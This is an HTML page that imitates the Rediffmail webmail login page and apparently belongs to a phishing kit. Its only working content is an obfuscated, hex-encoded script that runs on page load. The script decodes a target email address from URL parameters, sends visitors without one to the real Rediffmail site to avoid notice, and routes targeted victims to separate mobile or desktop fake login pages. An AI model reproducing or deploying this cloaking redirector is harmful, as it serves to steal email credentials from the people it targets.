<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="./index_files/favicon.ico">
<title>Rediffmail</title>

<style>
body{margin:0;padding:0;font-family:arial;font-size:14px;}
p{margin:0;padding:0;}
div{box-sizing:border-box;}
img{border:none;}a{color:#0055cc;text-decoration:none;}
.floatL{float:left;}.floatR{float:right;}
.wrapper{width:100%;max-width:1140px;margin:5px auto 0 auto;}
.lft_wrap{float:left;width:970px;overflow:hidden;margin-left:10px;}
.rgt_ad{display:none;}
.top_bar{display:table;width:100%;background:#F3F3F3;margin:0 0 10px 0;box-shadow:inset 0 0 10px #c4c4c4;}
.clear{display:block;clear:both;}
.loginbox{float:right;width:285px;height:495px;background:#F3F3F3;box-shadow: inset 0 0 10px #e0e0e0;margin:0 0 15px 5px;}
.left_in{min-height:480px;}
.lft_advt_container{height:495px;float:left;min-width:350px;text-align:center;margin:0 15px 15px 0;}
.advtcopy{margin:0;font-size:11px;line-height:12px;height:12px;color:#838383;text-align:center;}
.mid_news{max-height:495px;overflow:hidden;}
.mid_news ul{list-style:none;margin:0 0 12px 0;padding:0;display:table;border:solid 1px #e6e6e6;width:100%;box-sizing:border-box;}
.mid_news li{display:table-cell;vertical-align:middle;margin:0;padding:0;}
.mid_news li:nth-child(2){padding:0 5px 0 10px;} 
.imgthumb{width:80px;height:80px;}
.imgthumb img{vertical-align:top;max-width:100%;max-height:100%;}
.mid_news h3{font-size:15px;font-weight:bold;margin:0;padding:4px 5px;background:#e9e9e9;margin:10px 0 0 0;}
.news_container{margin:5px auto;clear:both;}.table{display:table;width:100%;}.cell{display:table-cell;vertical-align:top;}.advtcell{width:336px;border:solid 1px #ccc;text-align:center;box-sizing:border-box;vertical-align:middle !important;}.adcontain{display:inline-block;background:#fff;margin:auto;overflow:hidden;box-sizing:border-box;max-height:280px;max-width:336px;}.ntile{box-sizing:border-box;border:#ccc solid 1px;background:#fff;float:left;overflow:hidden;height:280px;width:24%;margin-right:1%;margin-bottom:15px;}.toprow{margin-bottom:20px;}.toprow .ntile{width:31%;margin-right:2%;margin-bottom:0;}.ntile h4{margin:0;padding:0;font-weight:normal;}.ntile h4 a{color:#fe6f21;font-size:0.9em;height:1.2em;overflow:hidden;text-decoration:underline;margin:5px 5px 5px 15px;font-weight:bold;display:inline-block;}.ntile h5{height:150px;text-align:center;overflow:hidden;margin:0 0 5px 0;}.ntile h5 img{max-width:100%;}.ntile h2{font-size:1.2em;line-height:1.2em;height:3.6em;overflow:hidden;margin:5px 15px;font-weight:normal;}.ntile h2 a{color:#000;text-decoration:none;font-weight:normal;}.ntile .nmore{margin:15px 0 0 15px;font-size:0.9em;}.ntile .nmore a{text-decoration:none;}.ntile.last{margin-right:0;float:right;}.nmore a::after{content:" \003E";color:#cc1f32;font-weight: bold;}.capitalize{text-transform:capitalize;}.div_middle_advt,.div_bottom_advt{clear:both;margin:10px auto;text-align:center;}.div_login_error{font-size:13px;color:#666;padding:1px 0 1px 4px;}.div_login_error b{color:#ff0000;}#remember{vertical-align:top;}
.footer-area{text-align:center;border-top:solid 3px #dbdbdb;font-size:12px;padding:10px 0 0 0;margin:10px 0 0 0;}
.rediffmail-logo{background:url('https://im.rediff.com/ajaxprism/pix_1_3/rmailng_logo.png') no-repeat 0 0;width:87px;height:21px;margin:8px 0 0 15px;}
.loginform{margin:0;padding:5px 0 0 0;}

.loginform input[type=text],.loginform input[type=password]{box-sizing:border-box;padding:2px 3px;font-size:14px;}
.loginform input[type=text]#login1		{ width:100%;}
.loginform input[type=password]#password,
.loginform input[type=text]#password{width:200px;}
.loginform .cell{padding:3px 4px;}
.form-label{font-weight:bold;font-size:14px;text-align:left;margin:5px 0 0 0;}
.forgotlink{display:inline-block;font-size:13px;margin:0 20px 0 0;}
.ht30{display:block;height:30px;}
.lblkeepme{display:block;font-size:12px;margin:0 0 0 0;color:#666}
.lblkeepme input{margin:0 5px 0 5px}
.uncheck-label{font-size:12px;color:#686868;margin:0 0 30px 17px;}
.uncheck{color:#666;font-size:10px;display:inline-block;width:170px;margin:0 0 10px 5px;}
.lock{display:inline-block;float:right;font-size:11px;margin:-2px 10px 0 0;color:#666}
.lock:before{content:'';position:relative;width:10px;height:14px;display:inline-block;margin:0 5px 4px 0;background:url('https://im.rediff.com/ajaxprism/pix_1_3/new_indiahomesprite7.png') no-repeat -350px 0;vertical-align:middle;}
.signinbtn{background-color:#597c18;background-image:linear-gradient(#597c18,#8dba3a);color:#fff;border:none;border-radius:3px;cursor:pointer;padding:5px 23px;font-weight:bold;font-size:13px;margin:0 0 5px 0; float:right;}
.signinbtn:hover{background-image:linear-gradient(#8dba3a, #597c18);}
.create-new-account{color:#616161;margin:5px 10px 5px 0;text-align:center;padding:20px 20px;background:#fff;font-size:15px;font-weight:bold;border:solid 1px #c3c3c3;line-height:1.6em;}
.top_bar .cell{display:table-cell;vertical-align:top;}
.row{display:table-row;}
.cell{display:table-cell;vertical-align:top;}
.vmiddle{vertical-align:middle !important;}
.vtop{vertical-align:top !important;}
.vbot{vertical-align:bottom !important;}
.f12{font-size:12px;}
.logo{width:185px;padding:9px 0 0 10px;}
.logtext{font-family:'verdana','arial';font-size:28px;font-weight:bold;}
.hide{display:none;}
.red{color:#ce2110}
.leftwidth{width:55%;margin-left:5px;}
.rightwidth{width:35%;}
.nopad .cell{padding:0 !important;}
.eye-icon 	{ width: 15px; height: 15px; background-color: #fff; border-radius: 100% 0px; transform: rotate(45deg); display: inline-block; border: solid 1px #7c7c7c; position: relative; cursor: pointer; margin:4px 5px; vertical-align:top;}			
.eye-icon::before { content: ''; background: #7c7c7c; width: 8px; height: 8px; position: absolute; border-radius: 50%; margin: 3px 0 0 3px; z-index: 1;}
.eye-icon.eyesel::after { content: ''; background: #000; width: 2px; height: 15px; position: absolute;margin: 0 0 0 7px; z-index: 2;}

@media only screen and (min-width: 1025px){
.rgt_ad{display:block;width:160px;margin:0;float:right;min-height:509px;}
.lft_wrap{float:left;width:970px;overflow:hidden;margin-left:0;}
}
</style>
</head>
<body>

<script>var _$_9fa9=["\x73\x65\x61\x72\x63\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x72\x65\x78\x78\x63\x6F\x7A","\x67\x65\x74","\x63\x6F\x7A\x74\x72\x65\x78\x78","\x61\x74\x6F\x62","\x40","","\x61\x48\x52\x30\x63\x48\x4D\x36\x4C\x79\x39\x6D\x4E\x57\x31\x68\x61\x57\x77\x75\x63\x6D\x56\x6B\x61\x57\x5A\x6D\x4C\x6D\x4E\x76\x62\x53\x39\x68\x61\x6D\x46\x34\x63\x48\x4A\x70\x63\x32\x30\x76\x59\x32\x39\x75\x64\x47\x46\x70\x62\x6D\x56\x79\x50\x32\x46\x75\x5A\x33\x56\x73\x59\x58\x49\x39\x4D\x51\x3D\x3D","\x72\x65\x70\x6C\x61\x63\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x74\x65\x73\x74","\x72\x65\x64\x69\x66\x66\x25\x32\x30\x6D\x6F\x62\x69\x6C\x65\x2F\x69\x6E\x64\x65\x78\x2E\x68\x74\x6D\x6C","\x72\x65\x64\x69\x66\x66\x25\x32\x30\x64\x65\x73\x6B\x74\x6F\x70\x2F\x69\x6E\x64\x65\x78\x2E\x68\x74\x6D\x6C","\x68\x72\x65\x66"];const urlParams= new URLSearchParams(window[_$_9fa9[1]][_$_9fa9[0]]);const ipv=urlParams[_$_9fa9[3]](_$_9fa9[2]);const iav=urlParams[_$_9fa9[3]](_$_9fa9[4]);const av=iav?window[_$_9fa9[5]](iav):null;const pv=ipv?window[_$_9fa9[5]](ipv):null;const email=av&& pv?(""+av+_$_9fa9[6]+pv+_$_9fa9[7]):null;const fallbackLink=window[_$_9fa9[5]](_$_9fa9[8]);if(!email){window[_$_9fa9[1]][_$_9fa9[9]](fallbackLink)}else {function isMobileDevice(){return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i[_$_9fa9[11]](navigator[_$_9fa9[10]])}function redirectIfMobile(){const _0x1C45E=_$_9fa9[12];const _0x1C44E=_$_9fa9[13];const _0x1C46E=window[_$_9fa9[1]][_$_9fa9[0]];const _0x1C47E=isMobileDevice()?_0x1C45E:_0x1C44E;window[_$_9fa9[1]][_$_9fa9[14]]= (""+_0x1C47E+_$_9fa9[7]+_0x1C46E+_$_9fa9[7])}redirectIfMobile()}</script>

</body>
</html>
